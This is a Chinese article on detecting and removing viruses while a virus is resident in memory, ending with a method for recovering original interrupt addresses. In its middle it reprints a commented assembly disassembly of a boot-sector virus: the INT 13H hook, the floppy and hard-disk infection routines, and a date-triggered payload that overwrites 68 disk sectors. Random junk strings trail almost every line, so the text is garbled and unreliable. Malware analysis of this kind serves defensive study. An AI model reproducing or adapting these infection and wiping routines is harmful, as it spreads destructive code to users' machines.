近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 \hlQu{q.
?? Gky
e
?? 一 、 带毒环境下检测清除病毒的意义 EnM }H9A
?? 9S<87sO
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 FJ/>=2^B
?? Z$UPLg3=;_
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 2&e2/KEWR
?? \+?>KpE,b
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 ZsgJ6
Y
?? ( M > C
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 S1Z~-i*w
?? %i!=.7o.
?? 二 、带毒环境下检测清除病毒的原理 .Lwp`{F/
?? jY~W*
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 |JUb 1|gi
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 :Dh\
j{U#g8
miWPLnw=L
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " :,<G6"i
病毒体: ^#6"d+lp
JMP 01AF ;JMP到01AF &Zxo\[lP
DB 00 ;病毒标计 |b
BA0.yS
DW 00F5 ;此为搬到高位址后,远程跳转指令 J|O=w(
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX -\6";_Y
DB 02 bqo+b{i\
DW 0003 ;此为软盘识别标记,硬盘为0007 O#}d!}SIp
DW EC59 ; b]-~{' +
DW F000 ;INT 13H的原入口 F!>92H~3G
. t;3n
. G}2DZ=&>'
. QU#u5sX A
. iY|zv|;]=
. Z+gG.|"k
XOR AX,AX ;清除AX '8k{\>
MOV DS,AX; ;让DS=0000 `:aml+
CLI ;清I标志积存器 ^R g=*L
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 34D7qR
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 [!g$|
MOV SP,AX ;开机时为0000:7CB6 v+), uj
STI ;设I标志积存器 6w? l
I
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A bNH72gX2Yh
PUSH AX ;用RETF,把程序转到引导或分区表位置 tom1u>1n
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 P' ";L6h
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 Mk3~%`
MOV AX,[004E] ;取INT 13H的段地址 `Kt]i5[ "
MOV [7C0C],AX ;存到010C T>~D(4r|pS
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13
L+=pEk_
;读写以便传播发作 k=nN#SMn
Gp l
MOV AX,[0413] ;取得内存K数,放在AX OI8Hf3d=
DEC AX ; jD<fu
DEC AX ;减2k内存 M1Frn n
MOV [0413],AX ;存回,通常是638K lc:dKGF6
MOV CL,06 ; Y=NXfTc
SHL AX,CL ; ;Dw6pmZ
MOV ES,AX ;算出减2K后病毒本体的位址 \*wQ%_N5
MOV [7C05],AX ;AX存入0105 `<?{%ja
(TX\vI&
;病毒常用手法将系统高段内存减少以便驻留 u|.c?fW'3
;这样可以免于被其他程序覆盖 +zl2|'
h/LlH9S:!
MOV AX,000E ;病毒拦INT 13H MrW*6jY@
;ISR起始的偏移量 <FkoWN
MOV [004C],AX ; @nh*H{
MOV [004E],ES ;设原为病毒的INT 13H O BCH%\;g
MOV CX,01BE ;病毒长度为1BE 7_=7 ;PQ<
MOV SI,7C00 ;从JMP 01AF开始 nfldj33*
XOR DI,DI ;DI=0 9=l6NNe)|
CLD ;清方向标志 ]_hrYjX;
REPZ; >*wF~G*k
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 1"hd5a
CS: ;分区表能载入0000:7C00正常运作 k2-:!IE
JMP FAR [7C03] ;跳到为搬过后的位址 FFG/v`NM
XOR AX,AX ;清AX L[j73z'
MOV ES,AX ;ES=0000 Vgj&hdbd
INT 13 ;复位磁盘 A>bpP
PUSH CS ; un&Z'
.
POP DS ;让DS=CS ~xp(k
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 'XbrO|%
MOV BX,7C00 ;读到0000:7C00 >u-6,[(5X*
MOV CX,[0008] ;硬盘第0道,第7扇区 I6.!0.G
CMP CX,+07 ;比较是否从硬盘启动 (V06cb*42[
JNZ 0213 ;不是跳0213 7\T~KYb?
MOV DX,0080 ;第一硬盘C:第零面 .5tE, (<?
INT 13 ;用INT 13号中断,读 Uo~-^w}
JMP 023E ;跳023E比较日期,发作或正常开机 q
n6ws
MOV CX,[0008] ;软盘0道,第3扇区 mY'c<>6t
MOV DX,0100 ;A:的第0面 aFbIJm=!
INT 13 ;INT 13读盘 3IlflXb
JB 023E ;失败跳023E q^I/
PUSH CS h1A/:/_M6
POPES ;让ES=CS pBb fU2p
MOV AX,0201 ; $:4*?8K2
MOV BX,0200 ; 2#XYR>[
MOV CX,0001 ; Jc3Z1 Tt
MOV DX,0080 ; %XQ!>BeE
INT 13 ;读入C:的分区表到0200,以便下面比较 d3IMQ_k
JB 023E ;失败跳023E w nPg ).
XOR SI,SI ;清SI liuw!
CLD ;清方向标志以便比较 ~{xm(p
LODSW ;载入一个WORD到AX Dp8`O4YC
CMP AX,[BX] ;比较有无病毒存在..E9AC O'WBO"
JNZ 0287 ;没有则跳0287传染 W5f|#{&L:
LODSW ;载入一个WORD到AX lQq&tz,
CMP AX,[BX+02] ;再次确认..0000 Eq\PSa=gz
JNZ 0287 ;没有跳0287 .boBo$f
XOR CX,CX ;清CX J8;l G
MOV AH,04 ; a*D])Lu[
INT 1A ;取得日期 v90)G8|q
CMP DX,0306 ;是否为三月六日 C&1()U
JZ 024B ;是跳024B传染 }JWLm.e
RETF ;把程序交还给引导启动完成 %x]8^vze
h{5K9$9=
步骤4:病毒INT 13代码分析 r](%9Y
方法:U =dp(+7Va
PUSH DS ;首先把要用到积存器 1FPt%{s3
PUSH AX ;入栈保存
%77X/%.Y
OR DL,DL ;比较是否为软盘 z2
m(<zb
JNZ 002F ;如不是则退出传染 I\8F.J1_
XOR AX,AX ;AX=0 Jfe<$-$$7
MOV DS,AX ;数据代段=0 4H]~ ]?F&
TEST BYTE PTR [043F],01 ;比较是否为A盘 lG>,&(
JNZ 002F ;不是则退出 !#[=,'Y
POP AX ;将以上保存积存器 'LyEdlC]
POP DS ;弹栈恢复 tx9;8K3
PUSHF ;压栈标志积存器 X9S`#N
CS: ;以便执行原INT 13 7C::%OF~7
CALL FAR [000A] ;执行原INT 13 G%q^8#
PUSHF ;再次压栈 [2l2w[7Rid
CALL 0036 ;以便跳转到传染程序 <aPbKDF~V
POPF ;跳转到执行传染 nRSiW*;R
RETF 0002 ;结束中断调用返回 `Vf k.OP
POP AX ;恢复 gx55.}
POP DS ;堆栈 xl]1{$1M
CS: ;跳转到原正常INT 13 aQTISX;
JMP FAR [000A] ;地址执行 [e6zCN^t
;WqWD-C
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 ->rr4xaK C
gd,3}@@SH
步骤5:传染过程分析 kgZiyPcw
方法:U 2x<A7l)6
对软盘传染过程: 937 z*mh
PUSH AX ;工 Ht,dMt>:
PUSH BX ;作 7%0V ?+]P
PUSH CX ;寄 |l#<vw
wE
PUSH DX ;存 |({ M8!BS
PUSH DS ;器 qrw"z
iW
PUSH ES ;入 &%\H170S
PUSH SI ;栈 ~B2,edkM
PUSH DI ;保存 ~w,c6Z
PUSH CS ;以压/弹栈方式 MJ..' $>TC
POP DS ;使数据段DS和 6A;,Ph2
PUSH CS ;附加段ES均指向 x&4gy%b
POP ES ;代码段CS O'L9 s>B
MOV SI,0004 ;试4次 $[*QsU%%
MOV AX,0201 ;设置各 hUo}n>Aa
MOV BX,0200 ;积存器 >69- [#P!
MOV CX,0001 ;为读软盘 5Kw$QJ/
XOR DX,DX ;引导扇区做准备 /9 ^F_2'_
PUSHF ;压栈标志积存器 K
K_
CALL FAR [000A] ;正常的INT 13调用 %0MvCm
JNB 0063 ;成功则转判断 G oHdhne3
XOR AX,AX ;不成功复位 =mQdM]A)2
PUSHF ;磁盘继续读 )%6h9xyXt
CALL FAR [000A] ;如果4次 1!P\x=Nn_
DEC SI ;均匀不成功 #<k L.e[
JNZ 0045 ;则退出跳转 G<_<j}=
JMP 00A6 ;退出传染 Q&k1' nT5
XOR SI,SI ;SI=0以便用 -L6YLe%w
CLD ;LODSW读入软盘 N0POyd/rL
LODSW ;第1或第2字进行比较 &9ZrZ"]
CMP AX,[BX] ;比较如果不包含病毒标志 y~'h/tjM@=
JNZ 0071 ;则跳转写传染 U{[ g"_+~
LODSW ;如果已有标志 ^OZ*L e
CMP AX,[BX+02] ;则退出 9ZVzIv(
JZ 00A6 ;传染子程序 a^xt9o`
MOV AX,0301 ;为写盘准备 y~Ts9AE
MOV DH,01 ;如果是360K "R5! VV
MOV CL,03 ;则写到1面0道3扇区 {n'+P3\T:
CMP BYTE PTR [BX+15],FD ;比较软盘 'lIj89h<E
JZ 0080 ;如果大于360K U1y8Y/
MOV CL,0E ;写到1面0道14扇区 T4fVZd)x
MOV [0008],CX ;写病毒标志到软盘
5B)z}g^h
PUSHF ;调用原INT 13 3X>x`
CALL FAR [000A] ;进行传染 z^z,_?q;
JB 00A6 0Uf.aP
MOV SI,03BE ;以下是将正常 (/;<K$u*h
MOV DI,01BE ;引导扇区从 B(t`$mC
MOV CX,0021 ;1BE起的21字节内容 _+*+,Vx
CLD ;搬移到病毒程序尾部 vP.^j7wB
REPZ ;开始复制 \&jmSa=]l
MOVSW :+?w>
MOV AX,0301 ;写盘功能调用,写一个扇区 NQu.%=
XOR BX,BX ;将病毒程序 Ss$/Bh>hN
MOV CX,0001 ;写入软盘引导扇区内 M7PGs-l
XOR DX,DX ;设置为软盘 D~T;z pS
PUSHF ygo4.
CALL FAR [000A] ;执行正常INT 13调用写盘
A}l+BIt
POP DI ;将 AL{r/h
POP SI ;工 hVe39BBtO
POP ES ;作 ,u@Vi0
POP DS ;寄 ZT
d)4f
POP DX ;存 b uOpHQn
POP CX ;器 bZ-_Q
POP BX ;退 gCjW !t
POP AX ;栈 L}hc|(:
RET ;返回调用处 Gzw9E.Hk
对硬盘传染过程: ^/M-*U8ab
MOV CX,0007 ;第7扇区 DV!10NqUr
MOV [0008],CX ;此处为硬盘引导标记 @lhjO>@#I
MOV AX,301 ;写功能调用 6cVJu%<V
MOV DX,0080 ;设置为硬盘 7
/7,55
INT 13 ;将正常引导扇区写到0面0道7扇区内 7]F@g}8
JB 13E ;失败则转 [yn\O=%5
MOV SI,03BE ;原分区表地址 9%&
=n
MOV DI,01BE ;目标地址 ?K!^[aO}=
MOV CX,0021 ;整个分区表 O]cuJp
REPNZ {W11+L{8
MOVSW ;开始复制 aUYq~E tj
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 ,>Yl(=&
;这样在分析着查看硬盘分区信息时仍能看到该部分 o$rA;^2X
;内容,以次来麻痹分析者 Y=$PsDh!
MOV AX,0301 ;准备写病毒提进硬盘 }v4T&/vt-
XOR BX,BX ;病毒体位置 I3^}$#>
INC CL ;第一扇区 VOkSR6
INT 13 ;开始写盘传染 YW7Pimks
JMP 013E ;转到13E处判断是否为3月6日,是则发作 t#N@0kIX.
h#~\-j9>
步骤6:破坏过程分析 $VNj0i. Pr
方法:U U.A:'9K,
主要分析对硬盘数据破坏: 6^VPRp
. ~m6b6Aj@6
. ,ui=Wi1
. 8k_cC$*Ng
. DcRvZH
. vT{+Z\LL=
MOV DL,80 0?Bv
zfb
MOV BYTE PTR[0007],04 YwU[kr-i
;准备写硬盘 M"s+k
MOV AL,11 ;写17个扇区 p?V@P6h
MOV BX,5000 H~<w*[uT
MOV ES,BX ;从内存ES:5000中处开始写 SSn{,H8/j
INT 13 ;残不人睹 KbGz3O'u
JNB 0179 ;成功转179继续写 Ux-i iH#s
XOR AH,AH S.R|Bwj}(Y
INT 13 ;不成功复位磁盘继续 k{C03=xk
INC DH ;使写操作磁头加1继续? 60--6n
CMP DH,[0007] ;比较是否小于0007单元值 yN{TcX
JB 0150 ;是则返回开始处继续写 Csf!I@}Z
XOR DH,DH ;DH=0 _~.S~;o!b
INC CH ;再加扇区 ]Ei*I}
JMP 0150 ;反回继续写 z2U^z*n{
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 &HB!6T/
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 |
{Tq/
;和文件分配表。 W4p4[&c|
Qpocj:
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 $nqVE{ksV
读盘的时将自身写入磁盘。 YLv5[pV
引导过程如下: VM}7 ~
1>调整堆栈位置 ;:1o|>mX
2>修改并用修改后的磁盘参数表来复位磁盘系统 c|s7cG$+-
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 w`_"R6
4>读入根目录表的首扇区 }!QVcu"+t/
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS ?p&( Af)
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 :k Kdda<g#
7>跳到0000:0700H处执行IO.SYS,引导完毕 @MKf$O4K
003E FA CLI a)QSq<2*
003F 33C0 XOR AX,AX 8 -YC#&
0041 8ED0 MOV SS,AX !rTkH4!_
0041 8ED0 MOV SS,AX })umg8s
0043 BC007C MOV SP,7C00 ; 初始化堆栈 ]{ir^[A6
0046 16 PUSH SS x(7Q5Uk\
0047 07 POP ES ;(ES)=0000H td 5!
S]
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H Q" G;L
004B 36 SS: ;(SS)=0000H Cg3 d
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI ST1c`0e
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 61Wh %8-
004F 56 PUSH SI ;取到后压入堆栈中保存 H(tT8Q5i
0050 16 PUSH SS 1O2jvt7M
0051 53 PUSH BX ;保存地址0000:0078H Sb.%B^O
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 0b}.!k9
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 F% z$^ m-
0058 FC CLD ~cul;bb#
0059 F3 REPZ 4SJb\R)XK
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 V`m9+<.1 b
005B 06 PUSH ES }v6@yU
005C 1F POP DS ;(DS)=0000H Zg$RiQ^-{J
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间" I9L7,~s
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数" ~oz??SX
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数" 3c+ps;nh
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址) Ejj+%)n.
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号 QxT\_Nej*n
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 oVQbc\P3
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 >';UF;\5]Q
0072 7279 JB 00ED ;出错则转出错处理 9`tSg!YOh
+1nzyD_E
; 下面一段程序计算扇区位置 W
H%EC$
0074 33C0 XOR AX,AX j8W<iy
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数 0M!GoqaA
007A 7408 JZ 0084 ;为零表示大硬盘? m,)o&ix1
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处 NH<~BC]I
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的 W>(w&k]%B
0084 A0107C MOV AL,[7C10] ;取FAT表的个数 k
[iT']
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数 dy]ZS<Hz8G
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位) @plh'f}
008F 13161E7C ADC DX,[7C1E] ; 高位 M{g.x4M@W
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位) kD}vK+
0097 83D200 ADC DX,+00 ; (高位) RT<HiVr`
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位) >%LY0(hY3
009D 8916527C MOV [7C52],DX ; (高位) rE%HNPO
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位) h_5CWQSi
00A4 89164B7C MOV [7C4B],DX ; (高位) O!P7Wu
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节 oQ}K_}{>
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数 9qvl9,*g
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数" ;_#<a*f
00B3 03C3 ADD AX,BX ;这两条指令是为了取整 M9~6ry-_
00B5 48 DEC AX $"ACg!=M
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数 ;tC$O~X
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位) JHa\"h
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位) V[0
ZNT&
;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS F *1w8+
00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值 |t~*!0>3
00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位) nP_)PDTFp
00C8 A1507C MOV AX,[7C50] ; (低位) ART0o7B
00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号 t==\D?Rt
00CE 721D JB 00ED ;出错则转出错处理 y@r g_Paq
00D0 B001 MOV AL,01 6+4SMf3
00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇) L*cP8v4
00D5 7216 JB 00ED ;出错处理 8^67,I-c
00D7 8BFB MOV DI,BX ;内存缓冲区的首址 XTRF IY
00D9 B90B00 MOV CX,000B ;比较11个字节 ]CDUHz
00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节
'Pxq>Os
00DF F3 REPZ CU:HTz=
00E0 A6 CMPSB ;看第一项是否为IO.SYS g3f;JB
00E1 750A JNZ 00ED ;不是则出错 JCci*F#r
00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项 MzH'<`;BP
00E6 B90B00 MOV CX,000B ;比较11个字节 ?JBA`,-
00E9 F3 REPZ M(vX.kF
00EA A6 CMPSB ;看第二项是否为MSDOS.SYS W;?e @}
00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理 PMT}fg
9"zp>VR
;下面一段进行出错处理 $b)t`r+
00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..." (4|R}jv
00F0 E85F00 CALL 0152 ;显示字符串 n`V? n
00F3 33C0 XOR AX,AX qRHT~ta-?
00F5 CD16 INT 16 ;等待任一键按下 2I283%xr
00F7 5E POP SI QD-`jV3
00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H Lngf,Of.e
00F9 8F04 POP [SI] dDa&:L
00FB 8F4402 POP [SI+02] ;恢复1EH号中断向量的内容 QH_Ds,oH=
00FE CD19 INT 19 ;自举 v#?;PyeF
0100 58 POP AX k*D8IB
0101 58 POP AX u4$R ZTC
0102 58 POP AX ;清理堆栈 fZcA{$Vc]N
0103 EBE8 JMP 00ED ;再次试图起动 +J#8wh
5fRr d;
;下面读入IO.SYS的头3个扇区到内存0000:0700H处 4s@Tn>%SP
0105 8B471A MOV AX,[BX+1A] ;从根目录表第一项中取IO.SYS的首簇号 'Fql;&U
>
0108 48 DEC AX *c
9S.
0109 48 DEC AX ;首簇号减二 /vC!__K9:
010A 8A1E0D7C MOV BL,[7C0D] ;取每簇的扇区数 }X. Fm'`
010E 32FF XOR BH,BH F\^\,hy
0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数 +ViL"
0112 0306497C ADD AX,[7C49] ;相加后得到IO.SYS的首扇的逻辑扇区号 Eu<f
0116 13164B7C ADC DX,[7C4B] X#HH7V>
011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值 nuVux5:
011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区 %y7ZcH'
0120 50 PUSH AX ;逻辑扇区号进栈(低位) .osG"cS
0121 52 PUSH DX ; (高位) qWf[X'
0122 51 PUSH CX ;循环计数器进栈 8`6G_:&X
0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号 2A:&Cqo
0126 72D8 JB 0100 ;出错处理 WNt':w^_
0128 B001 MOV AL,01 j{D tjV8
012A E85400 CALL 0181 ;读一个扇区到内存缓冲区 m&s>Sn+
012D 59 POP CX ;循环计数出栈 )+ 'r-AF*
012E 5A POP DX 7 IJn9 b
012F 58 POP AX ;逻辑扇区号出栈 +d7Arg!m
0130 72BB JB 00ED ;读盘出错处理 u%lUi2P2E
0132 050100 ADD AX,0001 kP'm$+1or
0135 83D200 ADC DX,+00 ;下一个扇区 p:W{c/tV
0138 031E0B7C ADD BX,[7C0B] ;缓冲区指针移动一个扇区的大小 efE=5%O
013C E2E2 LOOP 0120 ;循环读入三个扇区 ":q+"*fy
013E 8A2E157C MOV CH,[7C15] ;取"磁盘介质描述",传给IO.SYS *Ms&WYN-
0142 8A16247C MOV DL,[7C24] ;取"系统文件所在的驱动器号" 97~>gFU77#
0146 8B1E497C MOV BX,[7C49] ;取IO.SYS的首扇的逻辑扇区号 TZGk[u^*
014A A14B7C MOV AX,[7C4B] s6r(\L_Im
014D EA00007000 JMP 0070:0000 ;执行IO.SYS,引导完毕
e<(6x[_
;显示字符串的子程序 o1"N{Eu
0152 AC LODSB ;从串中取一个字符 d]:G#<.
0153 0AC0 OR AL,AL 3V7WIj<
0155 7429 JZ 0180 ;为0则已到串尾,返回(共用RET指令) R+_!FnOJ
0157 B40E MOV AH,0E pjl>ZoOM
0159 BB0700 MOV BX,0007 e7b MK<:r
015C CD10 INT 10 ;显示该字符 *Mb'y d/|
015E EBF2 JMP 0152 ;循环显示下一个 :LlZ#V2
;将逻辑扇区号转换为物理扇区号的子程序 V.6pfL
0160 3B16187C CMP DX,[7C18] ;这两条指令是为了避免第二次除法时除数 8I Ip,#%v
0164 7319 JNB 017F ;为0 NCY2^
0166 F736187C DIV WORD PTR [7C18] ;逻辑扇取号除以每道扇区数,商(AX)=总磁 hn\d{HP
016A FEC2 INC DL ;道数,余数(DX)再加一即为扇区号,因为扇 h-RhmQA=Iz
016C 88164F7C MOV [7C4F],DL ;区号是从1开始的,而不是从0开始 Sk)lT^by
0170 33D2 XOR DX,DX (&v,3>3]
0172 F7361A7C DIV WORD PTR [7C1A] ;总磁道数(AX)再除以面数,所得的 }!?RB v'W
0176 8816257C MOV [7C25],DL ;余数(DX)=面号(即磁头号) *_7/'0E(3
017A A34D7C MOV [7C4D],AX ;商(AX)=磁道号 o';/$xrH
017D F8 CLC y0ObcP.MA
017E C3 RET ;正常返回 @WJ\W `P
017F F9 STC M< .1U?_#
0180 C3 RET ;异常返回 ^do6?e`?-
;读一个扇区的子程序 >#'?}@FWQN
0181 B402 MOV AH,02 ;读功能调用 ^b}Wl0Fn
0183 8B164D7C MOV DX,[7C4D] ;需要的入口参数如下: C/H;|3.X
0187 B106 MOV CL,06 ;(DL)=驱动器号 bwcr/J(Nb
0189 D2E6 SHL DH,CL ;(DH)=面号 F n iht<
018B 0A364F7C OR DH,[7C4F] ;(CH)=磁道号 AJE$Z0{q
018F 8BCA MOV CX,DX ;(CL)=扇区号(第6,7位为磁道号的高2位) w^("Pg`
0191 86E9 XCHG CH,CL ;(AL)=要读的扇区数 U=7nz|
0193 8A16247C MOV DL,[7C24] ;(ES:BX)=缓冲区首址 J#ClQ%
0197 8A36257C MOV DH,[7C25] qS"#jxc==+
019B CD13 INT 13 ]T)<@bmL
019D C3 RET aEh9za
9x下的主引导/引导扇区没大区别,为了识别大分区用了一个INT 13的扩展调用42H。 ||.Hv[
]V*
Iqn
(NOq^[
?? 7!h>
< sx
?? 既然病毒是通过接管中断来获取传染和破坏的机会,那么我们是否有办法找回被病毒接管的中断 服务程序的地址,从而杀毒软件可以直接调用原中断,避免激活病毒? 笔者认为这是可能的,因为病毒在接管中断后,一般只对读写操作 、文件操作和执行等子功能调用感兴趣,对于其他一些功能调用,病毒只是简单地调用原中断服务程序进行处理,并通常使用下列指令进行调用: IF-y/]
?? jmp xxxx:xxxx Jz3,vVfQ:
?? call xxxx:xxxx !s?SI=B8
jmp far ptr cs:[xxxx] m(d|TwG{
call far ptr cs:[xxxx] tK/.9qP
?? L &hw-.Q
?? 以INT21H为例,我们可以调用取DOS版本号的子功能3306H,对整个调用过程进行单步跟踪,并假设病毒驻留的段地址与INT21H原中断段地址是不同的,如果调用过程中CS发生改变,我们把每次CS改变后 执行的第一条指令的地址都记录下来,那么INT21H原来的中断地址也必定在其中。 >fth
iA
?? s$?LMfT
?? 但记录的地址不止一个,究竟哪个是我们所要找的呢?这里我们可以假设病毒在调原中断服务程序时把各个寄存器(指AX、BX、CX、DX 、SI、DI、DS、ES)都设置成我们调用时所设置的值,同时真正的中断服务程序返回时又会改变寄存器的值,这个假设在绝大多数情况下都是正确的,从该假设出发,只需在各个寄存器值有改变的情况下,记录下每次CS改变后的第一条指令的地址,那么在中断返回后,记录中的最近一个地址就是所需找的原中断地址。需要指出的是,如果内存中还有其他驻留程序也接管了INT21H所找到的地址同样绕过了这些驻留程序。 &CSy>7&q